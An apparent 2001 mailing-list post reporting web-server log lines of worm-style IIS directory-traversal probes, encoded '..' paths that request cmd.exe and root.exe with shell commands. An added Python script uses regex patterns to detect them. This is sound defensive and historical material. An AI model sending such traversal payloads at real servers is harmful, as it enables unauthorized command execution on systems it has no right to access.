[lug] New worm war going on?
Samartha Deva
blug-receive at mtbwr.net
Tue Sep 18 11:56:49 MDT 2001
Seems there is some worm war going on, pretty crazy, I get a lot of this:
>63.101.179.133 - - [18/Sep/2001:11:51:34 -0600] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 332
>63.101.179.133 - - [18/Sep/2001:11:51:36 -0600] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 348
>63.101.179.133 - - [18/Sep/2001:11:51:37 -0600] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
>63.101.179.133 - - [18/Sep/2001:11:51:38 -0600] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
>63.101.179.133 - - [18/Sep/2001:11:51:39 -0600] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
>63.101.179.133 - - [18/Sep/2001:11:51:40 -0600] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
>63.101.179.133 - - [18/Sep/2001:11:51:45 -0600] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
>63.227.216.126 - - [18/Sep/2001:11:51:51 -0600] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 404 293
>63.101.179.133 - - [18/Sep/2001:11:51:55 -0600] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
>63.101.179.133 - - [18/Sep/2001:11:51:56 -0600] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
>63.101.179.133 - - [18/Sep/2001:11:51:58 -0600] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
>63.227.216.126 - - [18/Sep/2001:11:52:00 -0600] "GET
>/MSADC/root.exe?/c+dir HTTP/1.0" 404 291
>63.227.216.126 - - [18/Sep/2001:11:52:10 -0600] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
>63.227.216.126 - - [18/Sep/2001:11:52:19 -0600] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
Samartha
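The requests in the log above combine double percent-encoding (`%255c`, `%25%35%63`), byte pairs starting with `%c0`/`%c1`, and direct requests for `cmd.exe` or `root.exe`. The following triage script is an added example, not part of the original post, that tags such lines in an access log of this format; the names `classify` and `scan` are hypothetical, and the benign sample line is constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Three requests from the log above, rejoined onto single lines, plus one
# constructed benign request (192.0.2.10 is a documentation address).
SAMPLE = [
    '63.101.179.133 - - [18/Sep/2001:11:51:38 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314',
    '63.101.179.133 - - [18/Sep/2001:11:51:58 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315',
    '63.227.216.126 - - [18/Sep/2001:11:52:00 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 291',
    '192.0.2.10 - - [18/Sep/2001:11:52:30 -0600] "GET /docs/a%20b.html HTTP/1.0" 200 1024',
]

# client address, request target, status code
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')

def classify(target):
    """Return tags describing why a request target looks like a probe."""
    path = target.split("?", 1)[0].encode()
    passes = 0
    while passes < 5:                      # bounded: decode until stable
        decoded = unquote_to_bytes(path)
        if decoded == path:
            break
        path, passes = decoded, passes + 1
    tags = []
    if passes >= 2:                        # e.g. %255c -> %5c -> backslash
        tags.append("double-encoded")
    if re.search(rb"[\xc0\xc1]", path):    # 0xC0/0xC1 never occur in valid UTF-8
        tags.append("invalid-utf8-lead")
    if re.search(rb"\.\.[/\\]", path):     # ../ or ..\ after full decoding
        tags.append("traversal")
    if re.search(rb"(?i)/(cmd|root)\.exe$", path):
        tags.append("shell-target")
    return tags

def scan(lines):
    """Return (client, status, tags) for every line that earns a tag."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if m and (tags := classify(m.group(2))):
            findings.append((m.group(1), int(m.group(3)), tags))
    return findings

if __name__ == "__main__":
    for ip, status, tags in scan(SAMPLE):
        print(ip, status, ",".join(tags))
```

Decoding to a fixed point before matching is what lets one rule set cover every encoding variant in the log; the status code is kept in each finding so 404/400 probes can be told apart from any that returned 200.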